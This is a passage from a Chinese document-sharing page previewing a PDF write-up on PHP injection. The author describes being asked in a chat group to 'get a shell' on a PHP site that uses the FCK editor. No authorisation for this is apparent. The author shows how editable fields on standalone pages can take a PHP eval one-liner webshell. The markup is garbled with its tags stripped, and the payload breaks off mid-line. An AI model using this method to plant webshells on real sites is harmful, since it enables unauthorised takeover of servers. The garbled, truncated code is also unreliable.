利用前台漏洞突破后台限制PHP注入分析.pdfVIP

  • 0
  • 0
  • 约1.19千字
  • 约 1页
  • 2026-09-04 发布于北京
  • 举报

利用前台漏洞突破后台限制PHP注入分析.pdf

今天群里一个鸟人丢个叫帮忙拿shell。一看是FCK,就各种去弄了...结果无功而返,PHP

语言。过程就不说了,不是重点.后来台打开各种以及配合查看发现他的关于我

们\招贤纳士只能的页面是独立的php页面.这就好办了。写个一句话即可。至于怎么写,我

这就扯下。

看代码:

divid=con660class=left

divclass=con

h4业务领域/h4

spanclass=hei标题/spanbr

br

spanclass=hei标题2/spanbr

divclass=heidian内容/div

divclass=heidian内容/div

divclass=heidian内容/div

divclass=heidian内容/divbr

/div

divclass=clear/div

/div

这是他能够控制的部分,可以看到,标题和内容都被放在一个DIV里面

就拿标题部分来说吧

spanclass=hei标题/span

直接写入一句话将会变成

spanclass=hei?php@eval(

文档评论(0)

1亿VIP精品文档

相关文档